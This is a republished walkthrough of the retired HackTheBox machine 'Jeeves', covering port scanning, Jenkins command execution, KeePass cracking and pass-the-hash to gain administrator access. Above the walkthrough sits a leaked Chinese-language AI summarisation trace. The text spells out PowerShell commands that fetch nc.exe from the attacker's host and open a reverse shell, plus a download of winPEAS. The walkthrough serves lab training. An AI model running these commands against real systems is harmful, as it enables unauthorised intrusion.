Jeeves Retired Box from Hackthebox
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。用户已经提供了文章内容,看起来是关于渗透测试的。首先,我得通读一下文章,抓住主要步骤。 文章开始提到使用ping和nmap进行信息收集,发现开放的端口。接着用metasploit检查SMB版本,发现漏洞CVE-2020-0796,但未能成功利用。然后通过ffuf工具找到web目录askjeeves,利用powershell下载nc.exe获取初始权限。 之后使用winpeas进行提权,发现 KeePass 数据库。用John the Ripper破解密码,获得管理员权限,并最终通过Pass-the-Hash技术获取系统控制权。 现在我需要把这些步骤浓缩到100字以内,确保涵盖关键点:信息收集、漏洞利用、初始访问、提权和最终控制。同时要避免使用“这篇文章”这样的开头。 可能的结构是:信息收集→漏洞尝试→web目录→获取权限→提权→最终控制。这样可以确保在字数限制内传达主要内容。 </think> 文章描述了一次针对Hackthebox退役靶机“Jeeves”的渗透测试过程。通过信息收集、漏洞利用、初始访问和权限提升等步骤,最终成功获取系统控制权。 2026-2-22 15:1:51 Author: infosecwriteups.com(查看原文) 阅读量:7 收藏

Cyb0rgBytes

In this documentation and write-up I’ll be penetrating Hackthebox retired box “Jeeves” which is a medium box on Hackthebox. without more talking lets cut to the chase, and get lost in the astonishing loophole of the matrix.

While we are in any penetration testing engagement we start by information gathering , there are many tools at our disposal when it comes to information gathering.

lets start by pinging the target, ping command is used to send ICMP Requests to the target to check if its up :

  • ping 10.10.10.63 :
ping test for availability.

next we scan the target with nmap :

Press enter or click to view image in full size

Initial Nmap Scan

we notice from the scan that the following ports are open :

80 — HTTP

22 — SSH

445 — SMB

next what I’d like to do in this engagement is running smb version auxiliary scanner using metasploit to check

which version is the SMB in this target.

Press enter or click to view image in full size

SMB Version Check.

From the SMB version and after some researching I found that this version is vulnerable to SMB Ghost CVE_2020_0796_smbghost

as Shown in the screenshot below I’ve tried to exploit it but its not a viable approach.

Press enter or click to view image in full size

Checking SMBGhost Vulnerability

lets move on >>>

Through Enumeration and after enumerating the web directory I found a web directory called askjeeves on port 50000.

lets head to it now:

Press enter or click to view image in full size

Enumeration findings through ffuf tool.

next using this command for execution : powershell wget “http://10.10.14.3:8000/nc.exe" -outfile “nc.exe” nc.exe -e cmd 10.10.14.3 9001

Get Cyb0rgBytes’s stories in your inbox

Join Medium for free to get updates from this writer.

on the Build Section on Jenkins and while that is being built I’m listing on port 9001:

Press enter or click to view image in full size

Listening for incoming connection on port 9001.

also hosting nc.exe on my python HTTP server so I can grab it from my box to Jenkins box:

Press enter or click to view image in full size

Setting up Python Web server.

and there we go we got our initial foothold:

Press enter or click to view image in full size

Initial Foothold.

next for privilege escalation I’m going to use winpeas, first we need to transfer the file from our box to the target machine, again hosting python web-server and transferring the file using powershell >

powershell -c (New-Object Net.WebClient).DownloadFile(‘http://10.10.14.3:8000/winPEASx64.exe', ‘c:\windows\temp\winpeas.exe’)

while that is being ran I was looking around the directories where I found something really interesting :

Keepass password database 2.x KDBX

So I thought of an idea of cracking it with john, so lets get to it :

John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems. John the Ripper jumbo supports hundreds of hash and cipher types, including for: user passwords of Unix flavors

after cracking the password and launching the database file I found a couple more interesting info inside the database.

I found a hash that is for the admin user, from there I thought we can use Pass-the-Hash technique so lets go ahead and use it!

Press enter or click to view image in full size

Identifying the Keepass database file.

and here is the steps I took to do that :

powershell wget “http://10.10.14.28:8000/nc.exe" -outfile “nc.exe” nc.exe -e cmd 10.10.14.28 9001

After getting the initial foothold I’ve got admin through Pass the hash technique with impacket tool psexec.

after that getting root or admin in this case is by typing this command :

powershell Get-Content -Path “hm.txt” -Stream “root.txt”

Press enter or click to view image in full size

Found an interesting file called hm.txt

Thanks for reading, and stay tuned for the next!

Ready to level up your hacking skills?

Join Hack The Box — the ultimate platform to learn penetration testing and cybersecurity hands-on.

👉 Start hacking here and get access to real-world labs, challenges, and career-boosting skills.


文章来源: https://infosecwriteups.com/jeeves-retired-box-from-hackthebox-9721cb65b1d9?source=rss----7b722bfd1b8d---4
如有侵权请联系:admin#unsafe.sh